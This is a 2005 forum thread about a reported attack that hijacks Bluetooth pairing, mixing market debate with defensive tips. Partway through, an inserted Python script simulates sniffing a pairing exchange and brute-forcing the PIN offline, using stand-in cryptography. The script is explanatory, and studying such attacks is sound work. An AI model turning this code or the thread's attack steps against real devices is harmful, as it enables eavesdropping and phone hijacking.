More Bluetooth Blues
Darius Wey
06-04-2005, 12:30 AM
http://www.newscientist.com/article.ns?id=dn7461&feedId=online-news_rss20

"Cryptographers have discovered a way to hack Bluetooth-enabled devices even when security features are switched on. The discovery may make it even easier for hackers to eavesdrop on conversations and charge their own calls to someone else's cellphone. Bluetooth is a protocol that allows different devices including phones, laptops, headsets and printers to communicate wirelessly over short ranges - typically between 10 and 100 metres. Over the past few years security experts have devised many ways of hacking into Bluetooth communications, but most require the Bluetooth security features to be switched off. In April 2004, UK-based Ollie Whitehouse, at that time working for security firm @Stake, showed that even Bluetooth devices in secure mode could be attacked. His method allowed someone to hijack the phone, giving them the power to make calls as if it were in their own hands."

A couple of bright experts at Tel Aviv University have exposed the latest Bluetooth vulnerability. Step 1 - spoof one of the device's personal IDs (easily done as all discoverable Bluetooth devices broadcast this to any other Bluetooth-enabled device in sight). Step 2 - send a "forget" message (this prompts the other device to discard the original key and to create a new one to initiate a new paired session). Step 3 - you're in! All this in just 0.06 seconds. :roll:
PDANEWBIE
06-04-2005, 01:09 AM
Time for them to start on Bluetooth encryption *shudder*. Still, it sounds like you have to be using the Bluetooth and the second device at the time they are trying to crack, so in my everyday usage it would be very infrequently that I would be able to be "hacked".
Another question is how "hackable" is it as far as the profile usage. I mean if you have something using a Bluetooth headset profile, is that as valuable as a person who is using a serial port profile?
Paul Martin
06-04-2005, 03:29 AM
I had to double-check. I thought Ed had posted this. :wink:
Darius Wey
06-04-2005, 03:33 AM
I had to double-check. I thought Ed had posted this. :wink:
He still posted (http://www.pocketpcthoughts.com/forums/viewtopic.php?t=40574) on something blue anyway. ;)
Ash211
06-04-2005, 03:45 AM
Do you guys think it's really a good idea to be telling anyone and everyone how to perform this hack????
Darius Wey
06-04-2005, 03:54 AM
Do you guys think it's really a good idea to be telling anyone and everyone how to perform this hack????
This is more about "concept" than applying it in a "real-world scenario". It has already been published in New Scientist and a few other websites, so I don't think the world is immune to it. Besides, it's better to look at this article from the perspective that it's educating the community about the latest Bluetooth vulnerability and helping them to take necessary steps to prevent such attacks, rather than the perspective of telling them how they can use it to hack into their next-door neighbour's Bluetooth device. ;)
Janak Parekh
06-04-2005, 04:24 AM
helping them to take necessary steps to prevent such attacks
... like leaving their devices non-discoverable whenever possible. While it makes things like beaming business cards hard, that may be the cost for now until the model becomes more robust over time.
At least, I hope that works.
--janak
biglouis
06-04-2005, 10:29 AM
I really laughed out loud about this one. I've been a Bluetooth detractor from day one. It has been geeky ideas like Bluetooth that lost Ericsson the mobile phone market. While they were looking up their backsides over developing this largely irrelevant technology, Nokia was walking away with the mobile phone market with the press-on cover. Hardly hi-tech, but definitely marketing-led rather than technology-led. There is a lesson in there for all you readers who marvel at the latest technology. It may be cool, but someone has got to buy it.
Anyway, that aside. I recently purchased a new SD reader and I was offered at the same time a cheap BT USB adaptor. Why not? I thought, and purchased it for a laugh.
I plugged it in and happily searched for devices to link to. Apart from my JAM, I was impressed that the adaptor had the power to pick up my wife's T610, which was in her handbag but still in the same room. But I also noticed a third Nokia handset in the link list. Now, I don't own a Nokia BT handset, and neither does anyone in my family. My conclusion was that this had to be a handset from my neighbours, next door. I live in a small terrace house and my PC desk is next to my neighbours' party wall. I've never known a BT adaptor to be powerful enough to penetrate walls but, hey, this rogue device was definitely in the neighbourhood.
What really amused me was that when I then requested a list of services supported by devices in the BT neighbourhood the list included Nokia Data Suite. I'm sure most of you know that Data Suite can be used to transfer data to/from the BT handset.
I do happen to have a copy of Nokia Data Suite but as of yet I have not had either the time or interest to pursue this opportunity.
To be fair, I assume that whoever owns this handset is either unaware that the BT is turned on, or unaware how easy it is to detect and potentially interact with the handset.
Encryption for BT? Why bother!
bjornkeizers
06-04-2005, 12:53 PM
Sounds cool. If anyone does happen to find that interesting piece of software, I for one would love a copy ;-)
And people wonder why I never store sensitive data on PPC's and BT phones - here's your answer folks.
Jon Westfall
06-04-2005, 04:39 PM
I really laughed out loud about this one. I've been a Bluetooth detractor from day one. It has been geeky ideas like Bluetooth that lost Ericsson the mobile phone market. While they were looking up their backsides over developing this largely irrelevant technology, Nokia was walking away with the mobile phone market with the press-on cover. Hardly hi-tech, but definitely marketing-led rather than technology-led. There is a lesson in there for all you readers who marvel at the latest technology. It may be cool, but someone has got to buy it.
Largely irrelevant technology? I don't know but I'm willing to bet that the people who actually have the money to spend on unsubsidized phone and PDA purchases would rather have an easy system for wireless headsets, wireless modems and wireless sync'ing than press-on covers. In fact, I'd be willing to bet they are extremely uninterested in press-on covers.
Just because the US Market is just now starting to be interested in BT doesn't mean that this was the same everywhere else in the world. 2 years ago BT was becoming popular in Europe and Asia. Call me crazy, but that makes it "cool" and meets the "Someone has got to buy it" requirement.
Today's news is fairly uneventful in the scheme of Bluetooth. All technologies eventually are hacked, and many, if not all, simply devise new methods to secure themselves. Bluetooth, as much as you'd like to believe otherwise, is gaining popularity and usage. Time to admit that in the long run, it can become the market leader whereas press-on covers were only good for a few short years.
biglouis
06-04-2005, 05:01 PM
I'm willing to bet that the people who actually have the money to spend on unsubsidized phone and PDA purchases would rather have an easy system for wireless headsets, wireless modems and wireless sync'ing than press-on covers. In fact, I'd be willing to bet they are extremely uninterested in press-on covers.
I'd be happy to take that bet. The majority of phone purchasers have no idea what bluetooth is or what it is for. If you offer them a case or a free car charger it is more likely to clinch the purchase. At forums like this we have a very distorted image of the mass market and its desires because the majority of visitors and activists here are highly technical and early adopters.
As for the concept of "easy". Bluetooth Active Sync?? Am I missing something????
Dave Beauvais
06-04-2005, 06:13 PM
As for the concept of "easy". Bluetooth Active Sync?? Am I missing something????
You can't blame that on the technology, though; that particular "problem" is due to the implementation of the technology. Bluetooth syncing is a pain to set up and a hassle to use because the functionality was kinda tacked onto an already limited software system -- namely, ActiveSync. There are plenty of Bluetooth applications that work very seamlessly and very easily. Once I pair my Bluetooth GPS receiver with my iPAQ, for example, it just works. Wireless, hassle-free, and no bizarre jumping through hoops to make it work. A buddy's Bluetooth headset is the same. Once paired with his phone, it simply works.
Jon Westfall
06-04-2005, 06:54 PM
I'm willing to bet that the people who actually have the money to spend on unsubsidized phone and PDA purchases would rather have an easy system for wireless headsets, wireless modems and wireless sync'ing than press-on covers. In fact, I'd be willing to bet they are extremely uninterested in press-on covers.
I'd be happy to take that bet. The majority of phone purchasers have no idea what bluetooth is or what it is for. If you offer them a case or a free car charger it is more likely to clinch the purchase. At forums like this we have a very distorted image of the mass market and its desires because the majority of visitors and activists here are highly technical and early adopters.
As for the concept of "easy". Bluetooth Active Sync?? Am I missing something????
Notice how I said "unsubsidized". Kids and non-business consumers who sign up for 2 year contracts (Thus getting a subsidized phone, as the carrier is giving deep discounts to get them for 2 years) could care less about BT. Businesses who are going to be buying phones for their employees, or mobile executives who are likely to pay to have the exact phone they want will explore the options, find Bluetooth a lot more promising than changing the look of their phone, and go with it.
As for BT ActiveSync, I must be the only person in the world that doesn't suffer from problems with it. I did have one issue, and that was my ActiveSync liked to always try to connect as soon as it started to COM1 or some other non-BT COM port. I'd then get error messages, etc. I found a registry key that quickly fixed that problem. After I imported the following into my Registry, I haven't had any problems since (Note, replace the COM5 with whatever COM port you use to ActiveSync over BT)
Windows Registry Editor Version 5.00

; SerialPort pins ActiveSync to the Bluetooth serial port instead of COM1
[HKEY_CURRENT_USER\Software\Microsoft\Windows CE Services]
"SerialPort"="COM5"
sylvangale
06-04-2005, 09:01 PM
"Step 2 - send a "forget" message (this prompts the other device to discard the original key and to create a new one to initiate a new paired session)."
Don't all bluetooth phones require a confirmation on both sides on any new security code or does this let the security code get replaced without confirmation?
Whitehouse showed in 2004 that a hacker could arrive at this link key without knowing the PIN using a piece of equipment called a Bluetooth sniffer. This can record the exchanged messages being used to derive the link key and feed the recordings to software that knows the Bluetooth algorithms and can cycle through all 10,000 possibilities of the PIN. Once a hacker knows the link keys, Whitehouse reasoned they could hijack the device
Ummm... they seem to be assuming that the PIN is always 4 digits. Bluetooth PINs can be longer, though a lot of devices only use 4 digits. The connections between my PPC, computer, laptop and phone all use 6, 7 or 8 digit PINs.
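The sniff-then-brute-force step the article describes, and the PIN-length point made above, as an added worked example (this is not code from the thread or from the Tel Aviv or @Stake researchers). It replays the pairing key derivation for each candidate PIN against a captured exchange and stops when the recomputed authentication response matches the sniffed one. Assumption: the real Bluetooth functions E22, E21 and E1 are built on the SAFER+ block cipher; here they are replaced by HMAC-SHA256 with distinct labels so the script runs in plain Python, and the BD_ADDRs, PINs and the seeded random source are constructed sample data. The message flow (what is sent in clear, what is masked with the PIN-derived key, what the response reveals) is the part that matters.

```python
"""
Offline PIN recovery against a sniffed Bluetooth pairing (added illustration).

What a passive sniffer records once re-pairing has been forced:
  IN_RAND                 sent in clear by the initiator
  LK_RAND_A ^ Kinit       each side's random, masked with the PIN-derived Kinit
  LK_RAND_B ^ Kinit
  AU_RAND, SRES           the challenge/response run right after pairing

ASSUMPTION: E22/E21/E1 are SAFER+-based in the real protocol; HMAC-SHA256
with labels stands in for them here. The attack structure is unchanged.
"""
import hashlib
import hmac
import itertools
import random
from typing import Callable, Dict, Optional, Tuple

Capture = Dict[str, bytes]


def _prf(label: bytes, key: bytes, *parts: bytes) -> bytes:
    """Stand-in for the SAFER+-based Bluetooth functions (assumption)."""
    return hmac.new(key, label + b"".join(parts), hashlib.sha256).digest()[:16]


def e22(pin: bytes, bd_addr: bytes, in_rand: bytes) -> bytes:
    """Kinit = E22(PIN, BD_ADDR, IN_RAND): the only secret input is the PIN."""
    return _prf(b"E22", pin, bd_addr, in_rand)


def e21(lk_rand: bytes, bd_addr: bytes) -> bytes:
    """One device's contribution to the combination (link) key."""
    return _prf(b"E21", lk_rand, bd_addr)


def e1(link_key: bytes, au_rand: bytes, bd_addr: bytes) -> bytes:
    """SRES: 32-bit authentication response, the same width as the real one."""
    return _prf(b"E1", link_key, au_rand, bd_addr)[:4]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def pair_and_authenticate(pin: bytes, addr_a: bytes, addr_b: bytes,
                          rng: Callable[[int], bytes]) -> Capture:
    """Run both sides of pairing plus one authentication and return only
    what crosses the air, i.e. what a sniffer next to the victim gets."""
    in_rand = rng(16)
    kinit = e22(pin, addr_b, in_rand)              # both sides derive this
    lk_rand_a, lk_rand_b = rng(16), rng(16)
    masked_a = xor(lk_rand_a, kinit)               # A -> B
    masked_b = xor(lk_rand_b, kinit)               # B -> A
    kab = xor(e21(lk_rand_a, addr_a), e21(lk_rand_b, addr_b))   # link key
    au_rand = rng(16)                              # A challenges B
    sres = e1(kab, au_rand, addr_b)                # B answers with the link key
    return {"addr_a": addr_a, "addr_b": addr_b, "in_rand": in_rand,
            "masked_a": masked_a, "masked_b": masked_b,
            "au_rand": au_rand, "sres": sres}


def crack_pin(cap: Capture, max_digits: int = 4) -> Tuple[Optional[str], int]:
    """Replay the derivation for every numeric PIN of 1..max_digits digits
    until the recomputed SRES equals the sniffed one. Returns (pin, guesses)."""
    tried = 0
    for ndigits in range(1, max_digits + 1):
        for digits in itertools.product("0123456789", repeat=ndigits):
            tried += 1
            pin = "".join(digits).encode()
            kinit = e22(pin, cap["addr_b"], cap["in_rand"])
            lk_rand_a = xor(cap["masked_a"], kinit)    # unmask with the guess
            lk_rand_b = xor(cap["masked_b"], kinit)
            kab = xor(e21(lk_rand_a, cap["addr_a"]), e21(lk_rand_b, cap["addr_b"]))
            if e1(kab, cap["au_rand"], cap["addr_b"]) == cap["sres"]:
                return pin.decode(), tried
    return None, tried


# Constructed sample: two made-up BD_ADDRs and a seeded RNG so runs repeat.
ADDR_A = bytes.fromhex("001122334455")
ADDR_B = bytes.fromhex("66778899aabb")


def demo(pin: bytes, max_digits: int = 4, seed: int = 2005) -> Tuple[Optional[str], int]:
    cap = pair_and_authenticate(pin, ADDR_A, ADDR_B, random.Random(seed).randbytes)
    return crack_pin(cap, max_digits)


if __name__ == "__main__":
    print("4-digit PIN:", demo(b"1234"))                    # ('1234', 2345)
    print("8-digit PIN, 4-digit search:", demo(b"48271936"))  # (None, 11110)
```

Nothing in the capture is secret except the PIN, which is why the attacker can check guesses offline at whatever speed the hardware allows; each extra PIN digit multiplies the search by ten, so the second call exhausts every PIN of up to four digits without a hit.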
JvanEkris
06-04-2005, 11:37 PM
"Step 2 - send a "forget" message (this prompts the other device to discard the original key and to create a new one to initiate a new paired session)."
Don't all bluetooth phones require a confirmation on both sides on any new security code or does this let the security code get replaced without confirmation?
Problem is that the victim's phone ASSUMES it is talking to a known device (the MAC address of the sender is spoofed). Because of this the device trusts the action and responds to it accordingly. It should not trust such a message and indeed require confirmation.
jaap
jimski
06-05-2005, 08:18 AM
As for the concept of "easy". Bluetooth Active Sync?? Am I missing something????
Face it, anything that uses a Microsoft OS does not play all that well with BT. Bluetooth was not Microsoft's idea and I guess they can't buy it (I am sure they tried) so they basically ignored it for the past several years. Even the new implementation of BT in WinXP/SP2 has caused more trouble than it was worth.
All of my non-MS driven devices have worked flawlessly using BT, including 3 Sony-Ericsson phones, 2 Motorola phones, 2 BT built-in car kits (both SE and Moto), and several portable BT headsets and hands-free devices. The interaction between my iPAQs and BT devices has not always been smooth, but things are getting better (I paired my hx4700 and RAZR this week in less than a minute).
So if you want a pleasant BT experience, keep MS out of the picture and you too may see the light.
RenesisX
06-05-2005, 03:09 PM
I really laughed out loud about this one. I've been a Bluetooth detractor from day one. It has been geeky ideas like Bluetooth that lost Ericsson the mobile phone market. While they were looking up their backsides over developing this largely irrelevant technology, Nokia was walking away with the mobile phone market with the press-on cover.
It's interesting to note that there appear to be many more handsets being produced these days with Bluetooth than with interchangeable covers.
Certainly in countries like the UK where hands-free is a legal requirement whilst driving, Bluetooth has taken off in a big way as it's the only sensible way to connect a headset to a phone in a car. Personally I love to be able to get into my car, keeping my phone snug in my pocket and the car automatically pairs with my phone, accesses my SIM, uses my external antenna for higher-quality communication and I get a mic on my A-pillar and it even mutes the stereo when a call comes in.
I even use Bluetooth in the gym - I keep my Pocket PC tucked away playing my music which it sends to my Bluetooth headphones as I got pretty frustrated always knocking out the cable with my wired ones.
And I couldn't imagine having to find a cable and muck around with specific drivers and software just to get all the photos off my phone either.
Nearly everyone I know uses Bluetooth in some way on a daily basis, and my friends aren't just geeks. I realise its primary application (wireless headset in car) might not have such a great need in the USA though due to the differences in driving from other countries, e.g. mostly automatics (no need to change gear), easier, though less efficient road junctions, such as intersections vs. roundabouts.
Still, I would say it's a highly relevant technology which is completely indispensable.
shawnc
06-06-2005, 12:41 AM
As for the concept of "easy". Bluetooth Active Sync?? Am I missing something????
You can't blame that on the technology, though; that particular "problem" is due to the implementation of the technology.
This makes perfectly good sense..........if you're a techie. Like it or not, Biglouie has a very good point. Maybe BT is not a technology in search of people, but it will NEVER enjoy widespread appeal in this country (the largest market in the world by far) as long as there are "implementation" issues like you describe.
I like the idea of BT and am about to make my 1st foray into this growing technology. But if I have to worry about "stacks" and "compatibility", and if it doesn't work as seamlessly as my wireless wifi, I'm out. Never to be seen again.
Sven Johannsen
06-06-2005, 03:30 AM
but it will NEVER enjoy widespread appeal in this country (the largest market in the world by far)
You apparently haven't been paying attention to the Asian market if you think the US is significant in handheld and portable technology.
and if it doesn't work as seamlessly as my wireless wifi, I'm out
Glad you have good luck with Wifi. I would suggest that that technology has as many pitfalls and problems for the average consumer as BT. I would bet that the average person with a decent set of instructions could get BT AS working long before doing so over an Ad-hoc Wifi connection.
gwinter
06-06-2005, 01:16 PM
It has been geeky ideas like Bluetooth that lost Ericsson the mobile phone market.
My opinion is that Ericsson never really pushed hard in the mobile phone market. Their core business has always been in network equipments rather than end-user handsets. Nokia, on the other hand, is a handset company. That they were market leader, is logical.
As for the concept of "easy". Bluetooth Active Sync?? Am I missing something????
A bad implementation could ruin a good technology. When Bluetooth was designed, the primary usage scenario was handset-headset connection. And sure enough the first implementation was also in handset and headset to realize this scenario. So to see how "easy" it is supposed to be, take a look at this usage scenario.
shawnc
06-06-2005, 03:42 PM
and if it doesn't work as seamlessly as my wireless wifi, I'm out
Glad you have good luck with Wifi. I would suggest that that technology has as many pitfalls and problems for the average consumer as BT. I would bet that the average person with a decent set of instructions could get BT AS working long before doing so over an Ad-hoc Wifi connection.
That's a fair point if it's true. For someone as technologically challenged as I am to set up a wireless home network with little difficulty, well, I just assumed it was easy for all. Besides, I read the horror stories on this site about BT (and not just from EH :wink: ) all the time. Can't recall reading many about wireless wifi.
My luck with wireless includes syncing with AS. As a matter of fact, if I interpreted what I read correctly, and the next version of PPC software does NOT allow wireless AS sync, then this will DEFINITELY be my last PPC. I've become that dependent on my wireless AS sync. It works flawlessly and was very easy. Given my experience, and what I've read (mostly on this site), I find your implication that BT is just as easy to comprehend and set up for the average consumer as wifi hard to believe.
For someone as technologically challenged as I am to set up a wireless home network with little difficulty, well I just assumed it was easy for all.
Of course, the point of this thread is security. I assume (perhaps wrongly) that if you set up a Wi-Fi network at home "with little difficulty" you didn't bother to secure it. If you used the minimum of a WAP key, that can be broken much faster than Bluetooth. If you used anything with reasonable security such as 802.11x, then you are far more technologically focused than you let on.
As for this particular bug in Bluetooth security, some perspective is in order: many Bluetooth devices do not remain discoverable for more than a few minutes (or the user can optionally turn off discovery mode - which I recommend). This would easily prevent the hack. Second, even if a hacker does change the key, the user will discover the problem as soon as they try to use their own Bluetooth device. Thus, while it should not be ignored, this hack is not as dangerous as the very easy access to Wi-Fi afforded to hackers and non-hackers alike. (Since most Wi-Fi networks are completely open, anyone using Windows XP can automatically connect to such networks with no technical skills at all.)
Fuego
06-12-2005, 02:22 PM
Quite. Pair your devices and then turn off discoverable mode. Sacrificing the convenience of ad-hoc BT connections for a ton of security and much lower power consumption is a very good trade-off.
You'd be surprised how much extra power is consumed by remaining discoverable. I've been operating my BT devices (mobile phones, PDAs, GPS, headset, mice, keyboards, the list goes on) this way for as long as I can remember, just for this reason.
Use long PINs when pairing - at least 8 digits. Turn on confirmation prompts (authorisation required) and use encryption - BT already supports it.
Personally I would like to see BT devices shipped with everything secured - but then very few people would discover and use the features. Same as Wifi - out of the box it's unsecured.